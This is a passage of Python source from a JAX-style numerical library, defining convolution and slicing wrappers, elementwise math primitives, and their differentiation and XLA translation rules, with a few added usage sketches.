"""Convenience wrapper around `conv_general_dilated`.
Args:
lhs: a rank `n+2` dimensional input array.
rhs: a rank `n+2` dimensional array of kernel weights.
window_strides: a sequence of `n` integers, representing the inter-window
strides.
padding: either the string `'SAME'` or the string `'VALID'`.
precision: Optional. Either ``None``, which means the default precision for
the backend, a ``lax.Precision`` enum value (``Precision.DEFAULT``,
``Precision.HIGH`` or ``Precision.HIGHEST``) or a tuple of two
``lax.Precision`` enums indicating precision of ``lhs`` and ``rhs``.
Returns:
An array containing the convolution result.
"""
return conv_general_dilated(lhs, rhs, window_strides, padding,
precision=precision)
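# [Editor's note] Editor-added sketch of a plain NCHW/OIHW convolution through
# this wrapper; not part of the original module, assumes `jax.numpy` is available.
def _example_conv_sketch():
  import jax.numpy as jnp
  lhs = jnp.ones((1, 1, 5, 5), jnp.float32)   # NCHW input
  rhs = jnp.ones((1, 1, 3, 3), jnp.float32)   # OIHW kernel
  out = conv(lhs, rhs, (1, 1), 'VALID')
  assert out.shape == (1, 1, 3, 3)
  assert float(out[0, 0, 0, 0]) == 9.0        # each output sums a 3x3 window of ones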
def conv_with_general_padding(lhs: Array, rhs: Array,
window_strides: Sequence[int],
padding: Union[str, Sequence[Tuple[int, int]]],
lhs_dilation: Optional[Sequence[int]],
rhs_dilation: Optional[Sequence[int]],
precision: PrecisionLike = None) -> Array:
"""Convenience wrapper around `conv_general_dilated`.
Args:
lhs: a rank `n+2` dimensional input array.
rhs: a rank `n+2` dimensional array of kernel weights.
window_strides: a sequence of `n` integers, representing the inter-window
strides.
padding: either the string `'SAME'`, the string `'VALID'`, or a sequence of
`n` `(low, high)` integer pairs that give the padding to apply before and
after each spatial dimension.
lhs_dilation: `None`, or a sequence of `n` integers, giving the
dilation factor to apply in each spatial dimension of `lhs`. LHS dilation
is also known as transposed convolution.
rhs_dilation: `None`, or a sequence of `n` integers, giving the
dilation factor to apply in each spatial dimension of `rhs`. RHS dilation
is also known as atrous convolution.
precision: Optional. Either ``None``, which means the default precision for
the backend, a ``lax.Precision`` enum value (``Precision.DEFAULT``,
``Precision.HIGH`` or ``Precision.HIGHEST``) or a tuple of two
``lax.Precision`` enums indicating precision of ``lhs`` and ``rhs``.
Returns:
An array containing the convolution result.
"""
return conv_general_dilated(
lhs, rhs, window_strides, padding, lhs_dilation=lhs_dilation,
rhs_dilation=rhs_dilation, precision=precision)
def _conv_transpose_padding(k, s, padding):
"""Calculate before and after padding for a dim of transposed convolution.
Args:
k: int: kernel dimension.
s: int: dimension stride value.
padding: 'same' or 'valid' padding mode for original forward conv.
Returns:
2-tuple: ints: before and after padding for transposed convolution.
"""
if padding == 'SAME':
pad_len = k + s - 2
if s > k - 1:
pad_a = k - 1
else:
pad_a = int(np.ceil(pad_len / 2))
elif padding == 'VALID':
pad_len = k + s - 2 + _max(k - s, 0)
pad_a = k - 1
else:
raise ValueError('Padding mode must be `SAME` or `VALID`.')
pad_b = pad_len - pad_a
return pad_a, pad_b
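# [Editor's note] Editor-added worked example of the padding arithmetic above;
# not part of the original module, the helper name is hypothetical.
def _example_conv_transpose_padding_sketch():
  # Kernel size 3, stride 2:
  assert _conv_transpose_padding(3, 2, 'SAME') == (2, 1)
  assert _conv_transpose_padding(3, 2, 'VALID') == (2, 2)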
def _flip_axes(x, axes):
"""Flip ndarray 'x' along each axis specified in axes tuple."""
for axis in axes:
x = np.flip(x, axis)
return x
def conv_transpose(lhs: Array, rhs: Array, strides: Sequence[int],
padding: Union[str, Sequence[Tuple[int, int]]],
rhs_dilation: Optional[Sequence[int]] = None,
dimension_numbers: ConvGeneralDilatedDimensionNumbers = None,
transpose_kernel: bool = False,
precision: PrecisionLike = None) -> Array:
"""Convenience wrapper for calculating the N-d convolution "transpose".
This function directly calculates a fractionally strided conv rather than
indirectly calculating the gradient (transpose) of a forward convolution.
Args:
lhs: a rank `n+2` dimensional input array.
rhs: a rank `n+2` dimensional array of kernel weights.
strides: sequence of `n` integers, sets fractional stride.
padding: 'SAME', 'VALID' will set as transpose of corresponding forward
conv, or a sequence of `n` integer 2-tuples describing before-and-after
padding for each `n` spatial dimension.
rhs_dilation: `None`, or a sequence of `n` integers, giving the
dilation factor to apply in each spatial dimension of `rhs`. RHS dilation
is also known as atrous convolution.
dimension_numbers: tuple of dimension descriptors as in
lax.conv_general_dilated. Defaults to tensorflow convention.
transpose_kernel: if True flips spatial axes and swaps the input/output
channel axes of the kernel. This makes the output of this function identical
to the gradient-derived functions like keras.layers.Conv2DTranspose
applied to the same kernel. For typical use in neural nets this is completely
pointless and just makes input/output channel specification confusing.
precision: Optional. Either ``None``, which means the default precision for
the backend, a ``lax.Precision`` enum value (``Precision.DEFAULT``,
``Precision.HIGH`` or ``Precision.HIGHEST``) or a tuple of two
``lax.Precision`` enums indicating precision of ``lhs`` and ``rhs``.
Returns:
Transposed N-d convolution, with output padding following the conventions of
keras.layers.Conv2DTranspose.
"""
assert len(lhs.shape) == len(rhs.shape) and len(lhs.shape) >= 2
ndims = len(lhs.shape)
one = (1,) * (ndims - 2)
# Set dimensional layout defaults if not specified.
if dimension_numbers is None:
if ndims == 2:
dimension_numbers = ('NC', 'IO', 'NC')
elif ndims == 3:
dimension_numbers = ('NHC', 'HIO', 'NHC')
elif ndims == 4:
dimension_numbers = ('NHWC', 'HWIO', 'NHWC')
elif ndims == 5:
dimension_numbers = ('NHWDC', 'HWDIO', 'NHWDC')
else:
raise ValueError('No dimension_numbers defaults for inputs with more than '
'5 dimensions; please specify dimension_numbers explicitly.')
dn = conv_dimension_numbers(lhs.shape, rhs.shape, dimension_numbers)
k_shape = np.take(rhs.shape, dn.rhs_spec)
k_sdims = k_shape[2:] # type: ignore[index]
# Calculate correct output shape given padding and strides.
pads: Union[str, Sequence[Tuple[int, int]]]
if padding in {'SAME', 'VALID'}:
if rhs_dilation is None:
rhs_dilation = (1,) * (rhs.ndim - 2)
effective_k_size = map(lambda k, r: (k-1) * r + 1, k_sdims, rhs_dilation)
pads = [_conv_transpose_padding(k, s, padding)
for k,s in zip(effective_k_size, strides)]
else:
pads = padding
if transpose_kernel:
# flip spatial dims and swap input / output channel axes
rhs = _flip_axes(rhs, np.array(dn.rhs_spec)[2:])
rhs = np.swapaxes(rhs, dn.rhs_spec[0], dn.rhs_spec[1])
return conv_general_dilated(lhs, rhs, one, pads, strides, rhs_dilation, dn,
precision=precision)
def full_like(x: Array, fill_value: Array, dtype: Optional[DType] = None,
shape: Optional[Shape] = None) -> Array:
"""Create a full array like np.full based on the example array `x`.
Args:
x: example array-like, used for shape and dtype information.
fill_value: a scalar value to fill the entries of the output array.
dtype: optional, a dtype parameter for the output ndarray.
shape: optional, a shape parameter for the output ndarray.
Returns:
An ndarray with the same shape as `x` with its entries set equal to
`fill_value`, similar to the output of np.full.
"""
fill_shape = np.shape(x) if shape is None else canonicalize_shape(shape)
weak_type = dtype is None and dtypes.is_weakly_typed(x)
dtype = dtype or _dtype(x)
if not config.omnistaging_enabled:
fill_value = tie_in(x, fill_value)
return full(fill_shape, convert_element_type(fill_value, dtype, weak_type))
def collapse(operand: Array, start_dimension: int,
stop_dimension: int) -> Array:
"""Collapses dimensions of an array into a single dimension.
For example, if ``operand`` is an array with shape ``[2, 3, 4]``,
``collapse(operand, 0, 2).shape == (6, 4)``. The elements of the collapsed
dimension are laid out major-to-minor, i.e., with the lowest-numbered
dimension as the slowest varying dimension.
Args:
operand: an input array.
start_dimension: the start of the dimensions to collapse (inclusive).
stop_dimension: the end of the dimensions to collapse (exclusive).
Returns:
An array where dimensions ``[start_dimension, stop_dimension)`` have been
collapsed (raveled) into a single dimension.
"""
lo, hi = start_dimension, stop_dimension
size = prod(operand.shape[lo:hi])
new_shape = operand.shape[:lo] + (size,) + operand.shape[hi:]
return reshape(operand, new_shape)
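# [Editor's note] Illustrative sketch only (not part of the original module),
# assuming `jax.numpy` is available; the helper name is hypothetical.
def _example_collapse_sketch():
  import jax.numpy as jnp
  x = jnp.zeros((2, 3, 4))
  assert collapse(x, 0, 2).shape == (6, 4)   # dimensions [0, 2) raveled together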
def slice_in_dim(operand: Array, start_index: Optional[int],
limit_index: Optional[int],
stride: int = 1, axis: int = 0)-> Array:
"""Convenience wrapper around slice applying to only one dimension."""
start_indices = [0] * operand.ndim
limit_indices = list(operand.shape)
strides = [1] * operand.ndim
# translate `None`
len_axis = operand.shape[axis]
start_index_int = _canonicalize_dimension(start_index) if start_index is not None else 0
limit_index_int = _canonicalize_dimension(limit_index) if limit_index is not None else len_axis
# translate negative indices
if start_index_int < 0:
start_index_int = start_index_int + len_axis
if limit_index_int < 0:
limit_index_int = limit_index_int + len_axis
axis = int(axis)
start_indices[axis] = start_index_int
limit_indices[axis] = limit_index_int
strides[axis] = int(stride)
return slice(operand, start_indices, limit_indices, strides)
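# [Editor's note] Illustrative sketch only (not part of the original module),
# assuming `jax.numpy` is available; the helper name is hypothetical.
def _example_slice_in_dim_sketch():
  import jax.numpy as jnp
  x = jnp.arange(5)
  assert slice_in_dim(x, 1, 4).tolist() == [1, 2, 3]
  assert slice_in_dim(x, -2, None).tolist() == [3, 4]   # None means "to the end"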
def index_in_dim(operand: Array, index: int, axis: int = 0,
keepdims: bool = True) -> Array:
"""Convenience wrapper around slice to perform int indexing."""
index, axis = int(index), int(axis)
axis_size = operand.shape[axis]
wrapped_index = index + axis_size if index < 0 else index
if not 0 <= wrapped_index < axis_size:
msg = 'index {} is out of bounds for axis {} with size {}'
raise IndexError(msg.format(index, axis, axis_size))
result = slice_in_dim(operand, wrapped_index, wrapped_index + 1, 1, axis)
if keepdims:
return result
else:
return squeeze(result, (axis,))
def dynamic_slice_in_dim(operand: Array, start_index: Array,
slice_size: int, axis: int = 0) -> Array:
"""Convenience wrapper around dynamic_slice applying to one dimension."""
start_indices = [_zero(start_index)] * operand.ndim
slice_sizes = list(operand.shape)
axis = int(axis)
start_indices[axis] = start_index
slice_sizes[axis] = int(slice_size)
return dynamic_slice(operand, start_indices, slice_sizes)
def dynamic_index_in_dim(operand: Array, index: Array, axis: int = 0,
keepdims: bool = True) -> Array:
"""Convenience wrapper around dynamic_slice to perform int indexing."""
result = dynamic_slice_in_dim(operand, index, 1, axis)
if keepdims:
return result
else:
return squeeze(result, (axis,))
def dynamic_update_slice_in_dim(operand: Array, update: Array,
start_index: Array, axis: int) -> Array:
"""Convenience wrapper around :func:`dynamic_update_slice` to update a slice
in a single ``axis``.
"""
axis = int(axis)
start_indices = [_zero(start_index)] * _ndim(operand)
start_indices[axis] = start_index
return dynamic_update_slice(operand, update, start_indices)
def dynamic_update_index_in_dim(operand: Array, update: Array, index: Array,
axis: int) -> Array:
"""Convenience wrapper around :func:`dynamic_update_slice` to update a slice
of size 1 in a single ``axis``.
"""
axis = int(axis)
if _ndim(update) != _ndim(operand):
assert _ndim(update) + 1 == _ndim(operand)
update = expand_dims(update, (axis,))
return dynamic_update_slice_in_dim(operand, update, index, axis)
def batch_matmul(lhs: Array, rhs: Array,
precision: PrecisionLike = None) -> Array:
"""Batch matrix multiplication."""
if _min(lhs.ndim, rhs.ndim) < 2:
raise ValueError('Arguments to batch_matmul must be at least 2D, got {}, {}'
.format(lhs.ndim, rhs.ndim))
if lhs.ndim != rhs.ndim:
raise ValueError('Arguments to batch_matmul must have same ndim, got {}, {}'
.format(lhs.ndim, rhs.ndim))
lhs_contract = (lhs.ndim - 1,)
rhs_contract = (rhs.ndim - 2,)
batch = tuple(range(lhs.ndim - 2))
return dot_general(lhs, rhs, ((lhs_contract, rhs_contract), (batch, batch)),
precision=precision)
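# [Editor's note] Illustrative sketch only (not part of the original module),
# assuming `jax.numpy` is available; the helper name is hypothetical.
def _example_batch_matmul_sketch():
  import jax.numpy as jnp
  lhs = jnp.ones((2, 3, 4))
  rhs = jnp.ones((2, 4, 5))
  assert batch_matmul(lhs, rhs).shape == (2, 3, 5)   # leading dimension is the batch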
# These functions also exist in the XLA client library, but we treat them
# as non-primitive to maintain a smaller set of autodiff primitives.
def square(x: Array) -> Array:
r"""Elementwise square: :math:`x^2`."""
return integer_pow(x, 2)
def reciprocal(x: Array) -> Array:
r"""Elementwise reciprocal: :math:`1 \over x`."""
return integer_pow(x, -1)
def _upcast_fp16_for_computation(f):
@functools.wraps(f)
def f_wrapped(x):
dtype = _dtype(x)
if dtype == np.float16 or dtype == dtypes.bfloat16:
return convert_element_type(
f(convert_element_type(x, np.float32)), dtype)
return f(x)
return f_wrapped
def tan(x: Array) -> Array:
r"""Elementwise tangent: :math:`\mathrm{tan}(x)`."""
return tan_p.bind(x)
def asin(x: Array) -> Array:
r"""Elementwise arc sine: :math:`\mathrm{asin}(x)`."""
return asin_p.bind(x)
def acos(x: Array) -> Array:
r"""Elementwise arc cosine: :math:`\mathrm{acos}(x)`."""
return acos_p.bind(x)
def atan(x: Array) -> Array:
r"""Elementwise arc tangent: :math:`\mathrm{atan}(x)`."""
return atan_p.bind(x)
def sinh(x: Array) -> Array:
r"""Elementwise hyperbolic sine: :math:`\mathrm{sinh}(x)`."""
return sinh_p.bind(x)
def cosh(x: Array) -> Array:
r"""Elementwise hyperbolic cosine: :math:`\mathrm{cosh}(x)`."""
return cosh_p.bind(x)
def asinh(x: Array) -> Array:
r"""Elementwise inverse hyperbolic sine: :math:`\mathrm{asinh}(x)`."""
return asinh_p.bind(x)
def acosh(x: Array) -> Array:
r"""Elementwise inverse hyperbolic cosine: :math:`\mathrm{acosh}(x)`."""
return acosh_p.bind(x)
def atanh(x: Array) -> Array:
r"""Elementwise inverse hyperbolic tangent: :math:`\mathrm{atanh}(x)`."""
return atanh_p.bind(x)
# Add some methods to ShapedArray that rely on lax primitives
ShapedArray.broadcast = core.aval_method(broadcast)
ShapedArray.transpose = core.aval_method(transpose) # clobbered by lax_numpy
ShapedArray.reshape = core.aval_method(reshape) # clobbered by lax_numpy
def _iter(tracer):
if tracer.ndim == 0:
raise TypeError("iteration over a 0-d array") # same as numpy error
else:
n = int(tracer.shape[0])
# return (index_in_dim(tracer, i, keepdims=False) for i in range(n))
return iter([index_in_dim(tracer, i, keepdims=False) for i in range(n)])
ShapedArray._iter = staticmethod(_iter)
# Add some ad handlers that use (or could use) lax primitives
def zeros_like_array(x):
return full_like(x, 0)
for t in itertools.chain(
dtypes.python_scalar_dtypes.keys(), array_types,
[xla._CppDeviceArray, xla._DeviceArray, pxla.ShardedDeviceArray]):
ad_util.jaxval_adders[t] = add
ad_util.jaxval_zeros_likers[xla._DeviceArray] = zeros_like_array
ad_util.jaxval_zeros_likers[xla._CppDeviceArray] = zeros_like_array
ad_util.jaxval_zeros_likers[pxla.ShardedDeviceArray] = zeros_like_array
### primitives
_input_dtype = lambda *args, **_: dtypes.canonicalize_dtype(args[0].dtype)
_fixed_dtype = lambda dtype: lambda *args, **kwargs: dtypes.canonicalize_dtype(dtype)
_complex_basetype = lambda dtype: np.abs(np.zeros((), dtype)).dtype
_strip_weak_type = lambda *args, **_: False
def _argnum_weak_type(*argnums):
return lambda *args, **_: all(args[i].weak_type for i in argnums)
def standard_primitive(shape_rule, dtype_rule, name, translation_rule=None,
weak_type_rule=None):
weak_type_rule = weak_type_rule or _standard_weak_type_rule
prim = Primitive(name)
prim.def_impl(partial(xla.apply_primitive, prim))
prim.def_abstract_eval(partial(standard_abstract_eval, prim, shape_rule, dtype_rule, weak_type_rule))
xla.translations[prim] = translation_rule or partial(standard_translate, name)
return prim
def standard_abstract_eval(prim, shape_rule, dtype_rule, weak_type_rule, *avals, **kwargs):
assert all(isinstance(aval, UnshapedArray) for aval in avals), avals
assert not prim.multiple_results
weak_type = weak_type_rule(*avals, **kwargs)
least_specialized = _max(map(type, avals),
key=operator.attrgetter('array_abstraction_level'))
if least_specialized is ConcreteArray:
return ConcreteArray(prim.impl(*[x.val for x in avals], **kwargs),
weak_type=weak_type)
elif least_specialized is ShapedArray:
return ShapedArray(shape_rule(*avals, **kwargs), dtype_rule(*avals, **kwargs),
weak_type=weak_type)
elif least_specialized is UnshapedArray:
return UnshapedArray(dtype_rule(*avals, **kwargs), weak_type=weak_type)
else:
raise TypeError(avals, least_specialized)
def standard_multi_result_abstract_eval(
prim, shape_rule, dtype_rule, weak_type_rule, *avals, **kwargs):
assert prim.multiple_results
assert all(isinstance(aval, UnshapedArray) for aval in avals), avals
least_specialized = _max(map(type, avals),
key=operator.attrgetter('array_abstraction_level'))
weak_types = weak_type_rule(*avals, **kwargs)
if least_specialized is ConcreteArray:
out_vals = prim.impl(*[x.val for x in avals], **kwargs)
return [ConcreteArray(val, weak_type=weak_type)
for val, weak_type in safe_zip(out_vals, weak_types)]
elif least_specialized is ShapedArray:
out_shapes = shape_rule(*avals, **kwargs)
out_dtypes = dtype_rule(*avals, **kwargs)
return [ShapedArray(s, d, weak_type=weak_type)
for s, d, weak_type in safe_zip(out_shapes, out_dtypes, weak_types)]
elif least_specialized is UnshapedArray:
out_dtypes = dtype_rule(*avals, **kwargs)
return [UnshapedArray(dtype, weak_type=weak_type)
for dtype, weak_type in safe_zip(out_dtypes, weak_types)]
else:
raise TypeError(avals, least_specialized)
def standard_translate(name, c, *args, **kwargs):
xla_opname = ''.join(term.capitalize() for term in name.split('_'))
return getattr(xops, xla_opname)(*args, **kwargs)
def unop_dtype_rule(result_dtype, accepted_dtypes, name, aval, **kwargs):
if not any(dtypes.issubdtype(aval.dtype, t) for t in accepted_dtypes):
msg = '{} does not accept dtype {}. Accepted dtypes are subtypes of {}.'
typename = str(np.dtype(aval.dtype).name)
accepted_typenames = (t.__name__ for t in accepted_dtypes)
raise TypeError(msg.format(name, typename, ', '.join(accepted_typenames)))
return result_dtype(aval.dtype)
def unop(result_dtype, accepted_dtypes, name, translation_rule=None):
dtype_rule = partial(unop_dtype_rule, result_dtype, accepted_dtypes, name)
weak_type_rule = partial(_naryop_weak_type_rule, name)
prim = standard_primitive(_attrgetter('shape'), dtype_rule, name,
translation_rule=translation_rule, weak_type_rule=weak_type_rule)
batching.defvectorized(prim)
masking.defvectorized(prim)
return prim
standard_unop = partial(unop, _identity)
_attrgetter = lambda name: lambda x, **kwargs: getattr(x, name)
def naryop_dtype_rule(result_dtype, accepted_dtypes, name, *avals, **kwargs):
aval_dtypes = [aval.dtype for aval in avals]
for i, (aval_dtype, types) in enumerate(zip(aval_dtypes, accepted_dtypes)):
if not any(dtypes.issubdtype(aval_dtype, t) for t in types):
if aval_dtype is dtypes.float0:
raise TypeError(
f"Called {name} with a float0 at position {i}. "
"float0s do not support any operations by design, because they "
"are not compatible with non-trivial vector spaces. No implicit dtype "
"conversion is done. You can use np.zeros_like(arr, dtype=np.float) "
"to cast a float0 array to a regular zeros array. \n"
"If you didn't expect to get a float0 you might have accidentally "
"taken a gradient with respect to an integer argument.")
else:
msg = ('{} does not accept dtype {} at position {}. '
'Accepted dtypes at position {} are subtypes of {}.')
typename = str(np.dtype(aval_dtype).name)
typenames = ', '.join(t.__name__ for t in types)
raise TypeError(msg.format(name, typename, i, i, typenames))
_check_same_dtypes(name, False, *aval_dtypes)
return result_dtype(*avals)
def _broadcasting_shape_rule(name, *avals):
shapes = [aval.shape for aval in avals if aval.shape]
if not shapes:
return ()
if len({len(shape) for shape in shapes}) != 1:
msg = '{} got arrays of different rank: {}.'
raise TypeError(msg.format(name, ', '.join(map(str, map(tuple, shapes)))))
result_shape = _try_broadcast_shapes(shapes)
if result_shape is None:
msg = '{} got incompatible shapes for broadcasting: {}.'
raise TypeError(msg.format(name, ', '.join(map(str, map(tuple, shapes)))))
return result_shape
def _standard_weak_type_rule(*avals, **kwargs):
return all(aval.weak_type for aval in avals)
def _naryop_weak_type_rule(name, *avals, **kwargs):
if any(aval.dtype is dtypes.float0 for aval in avals):
pos = next(i for i, aval in enumerate(avals) if aval.dtype is dtypes.float0)
raise TypeError(
f"Called {name} with a float0 at position {pos}. "
"float0s do not support any operations by design, because they "
"are not compatible with non-trivial vector spaces. No implicit dtype "
"conversion is done. You can use np.zeros_like(arr, dtype=np.float) "
"to cast a float0 array to a regular zeros array. \n"
"If you didn't expect to get a float0 you might have accidentally "
"taken a gradient with respect to an integer argument.")
return all(aval.weak_type for aval in avals)
def naryop(result_dtype, accepted_dtypes, name, translation_rule=None):
dtype_rule = partial(naryop_dtype_rule, result_dtype, accepted_dtypes, name)
shape_rule = partial(_broadcasting_shape_rule, name)
weak_type_rule = partial(_naryop_weak_type_rule, name)
prim = standard_primitive(shape_rule, dtype_rule, name,
translation_rule=translation_rule,
weak_type_rule=weak_type_rule)
batching.defbroadcasting(prim)
masking.defnaryop(prim)
return prim
standard_naryop = partial(naryop, _input_dtype)
def _broadcast_translate(translate: Callable):
# Decorator for translation rules which adds explicit broadcasting of
# positional arguments. This is necessary only for a handful of primitives
# whose XLA implementations do not support broadcasting.
def _broadcast_array(array, array_shape, result_shape):
if array_shape == result_shape:
return array
bcast_dims = tuple(range(len(result_shape) - len(array_shape),
len(result_shape)))
result = xops.BroadcastInDim(array, result_shape, bcast_dims)
return result
def _broadcasted_translation_rule(c, *args, **kwargs):
shapes = [c.get_shape(arg).dimensions() for arg in args]
result_shape = broadcast_shapes(*shapes)
args = [_broadcast_array(arg, arg_shape, result_shape)
for arg, arg_shape in zip(args, shapes)]
return translate(c, *args, **kwargs)
return _broadcasted_translation_rule
# NOTE(mattjj): this isn't great for orchestrate fwd mode because it means JVPs
# get two extra ops in them: a reshape and a broadcast_in_dim (or sometimes just
# a broadcast). but saving the shape info with the primitives isn't great either
# because then we can't trace these ops without shape data.
def _brcast(x, *others):
# Used in jvprules to make naryop broadcasting explicit for transposability.
# Requires shape info during jvp tracing, which isn't strictly necessary.
# We don't need full numpy broadcasting, but otherwise the logic is the same
# so we reuse the broadcast_shapes function after filtering out scalars.
shapes = tuple(filter(None, map(np.shape, (x,) + others)))
shape = shapes and broadcast_shapes(*shapes)
if np.shape(x) != shape:
return _brcast_to(x, shape)
else:
return x
def _brcast_to(x, shape):
x_shape = np.shape(x)
assert x_shape != shape
if x_shape:
assert len(x_shape) == len(shape)
broadcast_dimensions, = np.where(np.equal(x_shape, shape))
squeezed_dimensions, = np.where(np.not_equal(x_shape, shape))
squeezed = squeeze(x, squeezed_dimensions)
return broadcast_in_dim(squeezed, shape, broadcast_dimensions)
else:
return broadcast(x, shape)
_float = {np.floating}
_complex = {np.complexfloating}
_complex_elem_types = {np.float32, np.float64}
_int = {np.integer}
_bool = {np.bool_}
_num = _int | _float | _complex
_any = _int | _float | _complex | _bool
_bool_or_int = _int | _bool
neg_p = standard_unop(_num, 'neg')
ad.deflinear2(neg_p, lambda t, operand: [neg(t)])
def _sign_translation_rule(c, x):
shape = c.get_shape(x)
dtype = shape.numpy_dtype()
if dtypes.issubdtype(dtype, np.unsignedinteger):
zero = xb.constant(c, np.array(0, dtype=dtype))
dims = c.get_shape(x).dimensions()
return xops.Select(xops.Eq(x, zero), xops.Broadcast(zero, dims),
xops.Broadcast(xb.constant(c, np.array(1, dtype=dtype)),
dims))
return xops.Sign(x)
sign_p = standard_unop(_num, 'sign', translation_rule=_sign_translation_rule)
ad.defjvp_zero(sign_p)
nextafter_p = standard_naryop(
[_float, _float], 'nextafter',
translation_rule=_broadcast_translate(partial(standard_translate, 'next_after')))
floor_p = standard_unop(_float, 'floor')
ad.defjvp_zero(floor_p)
ceil_p = standard_unop(_float, 'ceil')
ad.defjvp_zero(ceil_p)
def _round_to_nearest_even(x):
half = _const(x, 0.5)
one = _const(x, 1)
round_val = floor(x)
fraction = x - round_val
nearest_even_int = sub(
round_val, mul(_const(x, 2), floor(mul(half, x))))
is_odd = eq(nearest_even_int, one)
return select(
bitwise_or(gt(fraction, half),
bitwise_and(eq(fraction, half), is_odd)),
add(round_val, one), round_val)
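# Illustrative sketch (not part of the library): _round_to_nearest_even
# implements round-half-to-even ("banker's rounding"), which is also NumPy's
# convention. A hypothetical NumPy-only check of the halfway cases the select
# above is written to handle:
def _example_round_half_to_even():
  import numpy as np
  xs = np.array([-1.5, -0.5, 0.5, 1.5, 2.5], np.float32)
  expected = np.array([-2.0, -0.0, 0.0, 2.0, 2.0], np.float32)
  assert np.array_equal(np.round(xs), expected)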
def _round_translation_rule(c, x, *, rounding_method):
if rounding_method is RoundingMethod.AWAY_FROM_ZERO:
return xops.Round(x)
else: # rounding_method is RoundingMethod.TO_NEAREST_EVEN
rounding_fun = xla.lower_fun(_round_to_nearest_even, multiple_results=False)
return rounding_fun(c, x)
round_p = standard_unop(_float, 'round')
xla.translations[round_p] = _round_translation_rule
ad.defjvp_zero(round_p)
is_finite_p = unop(_fixed_dtype(np.bool_), _float, 'is_finite')
ad.defjvp_zero(is_finite_p)
exp_p = standard_unop(_float | _complex, 'exp')
ad.defjvp2(exp_p, lambda g, ans, x: mul(g, ans))
iad.definverse(exp_p, lambda r, x: log(r))
# For exp_p it is more efficient to use the reconstructed output for the vjp
# rule instead of computing it again from the input.
iad.primitive_ivjps[exp_p] = lambda x, y, ct: [[log(y[0])], [ct[0] * y[0]]]
log_p = standard_unop(_float | _complex, 'log')
ad.defjvp(log_p, lambda g, x: div(g, x))
iad.definverse(log_p, lambda r, x: exp(r))
expm1_p = standard_unop(_float | _complex, 'expm1')
ad.defjvp2(expm1_p, lambda g, ans, x: mul(g, add(ans, _one(ans))))
log1p_p = standard_unop(_float | _complex, 'log1p')
ad.defjvp(log1p_p, lambda g, x: div(g, add(x, _one(x))))
tanh_p = standard_unop(_float | _complex, 'tanh')
ad.defjvp2(tanh_p, lambda g, ans, x: mul(add(g, mul(g, ans)),
sub(_one(x), ans)))
sin_p = standard_unop(_float | _complex, 'sin')
ad.defjvp(sin_p, lambda g, x: mul(g, cos(x)))
cos_p = standard_unop(_float | _complex, 'cos')
ad.defjvp(cos_p, lambda g, x: neg(mul(g, sin(x))))
@partial(xla.lower_fun, multiple_results=False)
@_upcast_fp16_for_computation
def tan_translation_rule(x):
return div(sin(x), cos(x))
tan_p = standard_unop(_float | _complex, 'tan',
translation_rule=tan_translation_rule)
ad.defjvp(tan_p, lambda g, x: mul(g, _const(x, 1) + square(tan(x))))
@partial(xla.lower_fun, multiple_results=False)
def asin_translation_rule(x):
if dtypes.issubdtype(_dtype(x), np.complexfloating):
return mul(_const(x, -1j), asinh(mul(_const(x, 1j), x)))
else:
return mul(_const(x, 2),
atan2(x, add(_const(x, 1), sqrt(sub(_const(x, 1), square(x))))))
asin_p = standard_unop(_float | _complex, 'asin',
translation_rule=asin_translation_rule)
ad.defjvp(asin_p, lambda g, x: mul(g, rsqrt(_const(x, 1) - square(x))))
@partial(xla.lower_fun, multiple_results=False)
def acos_translation_rule(x):
if dtypes.issubdtype(_dtype(x), np.complexfloating):
result = mul(_const(x, 1j), acosh(x))
# By convention, numpy chooses the branch with positive real part.
rpart = real(result)
return select(
gt(rpart, _const(rpart, 0)),
result,
neg(result)
)
else:
return select(
ne(x, _const(x, -1.0)),
mul(_const(x, 2),
atan2(sqrt(sub(_const(x, 1), square(x))), add(_const(x, 1), x))),
full_like(x, np.pi))
acos_p = standard_unop(_float | _complex, 'acos',
translation_rule=acos_translation_rule)
ad.defjvp(acos_p, lambda g, x: mul(g, -rsqrt(_const(x, 1) - square(x))))
@partial(xla.lower_fun, multiple_results=False)
def atan_translation_rule(x):
if dtypes.issubdtype(_dtype(x), np.complexfloating):
return mul(_const(x, -1j), atanh(mul(_const(x, 1j), x)))
else:
return atan2(x, _const(x, 1))
atan_p = standard_unop(_float | _complex, 'atan',
translation_rule=atan_translation_rule)
ad.defjvp(atan_p, lambda g, x: div(g, _const(x, 1) + square(x)))
atan2_p = standard_naryop([_float, _float], 'atan2')
ad.defjvp(atan2_p,
lambda g, x, y: _brcast(g, y) * (y / (square(x) + square(y))),
lambda g, x, y: _brcast(g, x) * -x / (square(x) + square(y)))
sinh_p = standard_unop(_float | _complex, 'sinh')
ad.defjvp(sinh_p, lambda g, x: mul(g, cosh(x)))
cosh_p = standard_unop(_float | _complex, 'cosh')
ad.defjvp(cosh_p, lambda g, x: mul(g, sinh(x)))
asinh_p = standard_unop(_float | _complex, 'asinh')
ad.defjvp(asinh_p, lambda g, x: mul(g, rsqrt(square(x) + _one(x))))
acosh_p = standard_unop(_float | _complex, 'acosh')
ad.defjvp(acosh_p,
lambda g, x: mul(g, rsqrt((x - _one(x)) * (x + _one(x)))))
atanh_p = standard_unop(_float | _complex, 'atanh')
ad.defjvp(atanh_p,
lambda g, x: mul(reciprocal(_one(x) + x), div(g, (_one(x) - x))))
regularized_incomplete_beta_p = standard_naryop(
[_float, _float, _float], 'regularized_incomplete_beta',
translation_rule=_broadcast_translate(
partial(standard_translate, 'regularized_incomplete_beta')))
def betainc_gradx(g, a, b, x):
lbeta = lgamma(a) + lgamma(b) - lgamma(a + b)
partial_x = exp((b - 1) * log1p(-x) +
(a - 1) * log(x) - lbeta)
return partial_x * g
def betainc_grad_not_implemented(g, a, b, x):
raise ValueError("Betainc gradient with respect to a and b not supported.")
ad.defjvp(regularized_incomplete_beta_p,
betainc_grad_not_implemented,
betainc_grad_not_implemented,
betainc_gradx)
lgamma_p = standard_unop(_float, 'lgamma')
ad.defjvp(lgamma_p, lambda g, x: mul(g, digamma(x)))
digamma_p = standard_unop(_float, 'digamma')
igamma_p = standard_naryop(
[_float, _float], 'igamma',
translation_rule=_broadcast_translate(partial(standard_translate, 'igamma')))
igamma_grad_a_p = standard_naryop([_float, _float], 'igamma_grad_a',
translation_rule=_broadcast_translate(partial(standard_translate,
'igamma_grad_a')))
def igamma_gradx(g, a, x):
return _brcast(g, a, x) * exp(-x + (a - _ones(a)) * log(x) - lgamma(a))
def igamma_grada(g, a, x):
return _brcast(g, a, x) * igamma_grad_a(a, x)
ad.defjvp(igamma_p, igamma_grada, igamma_gradx)
igammac_p = standard_naryop(
